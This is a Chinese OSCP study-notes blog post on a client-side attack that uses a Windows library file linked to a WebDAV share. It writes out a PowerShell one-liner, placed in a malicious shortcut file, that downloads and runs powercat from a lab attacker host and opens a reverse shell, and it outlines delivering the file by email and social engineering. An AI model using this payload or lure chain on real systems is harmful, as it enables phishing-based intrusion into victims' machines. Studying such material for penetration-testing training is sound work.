6-6〔O҉S҉C҉P҉ ◈ 研记〕❘ 客户端攻击▸利用Windows库资料进行攻击-2
郑重声明:本文所有安全知识与技术,仅用于探讨、研究及学习,严禁用于违反国家法律法规的非法活动。对于因不当启用相关内容造成的任何损失或法律责任,本人不承担任何责任。 如需转载,请注明出处且不得用于商业盈利。
点赞❤️ 关注 收藏⭐️ 评论
更多文章戳晖度丨安全视界-CSDN博客(原名:whoami!)

客户端攻击通常是欺骗用户在操作系统上执行恶意代码,小心啊 !
- , !
→ 信息收集
→ 漏洞检测
→ 初始立足点▸客户端攻击▸利用Windows库文件进行攻击-2-----大家在这儿~
→ 权限提升
→ 横向移动
→ 报告/分析
→ 教训/修复
目录
1 客户端攻击
1.2 利用Windows库文件进行客户端攻击
接前文,目前已经完成了库文件链接到WebDAV的共享目录。接下来要做:
载荷部署:在WebDAV共享目录放置恶意快捷方式文件(建立反向shell)
邮件投递:将库文件作为附件发送
诱导执行:通过社会工程学诱导用户点击(执行)
建立连接:成功获取反向shell
1.2.3 创建恶意快捷方式文件.lnk
1.2.3.1 攻击链完整流程

1.2.3.2 创建恶意快捷方式文件
powershell代码执行流程示意:

反向shell流程示意:

右键桌面 → 新建 → 快捷方式
输入恶意PowerShell命令
把命令输入到下图红框处
这样快捷方式文件就搞定了
powershell.exe -c "IEX(New-ObjectSystem.Net.Webclient).Downloadstring('http://192.168.119.3:8000/powercat.ps1');powercat-c 192.168.119.3-p 4444 -e powershell"
命令组件分解表
| 组件部分 | 具体内容 | 功能作用 |
|---|---|---|
| 可执行程序 | powershell.exe | 启动PowerShell解释器 |
| 执行参数 | -c | 执行后续字符串中的命令 |
| 下载组件 | IEX(New-Object System.Net.WebClient).DownloadString() | 远程下载并执行脚本内容 |
| 下载地址 | http://192.168.119.3:8000/powercat.ps1 | 从攻击者服务器下载PowerCat工具 |
| PowerCat参数 | powercat -c 192.168.119.3 -p 4444 -e powershell | 建立反向 |
浙公网安备 33010602011771号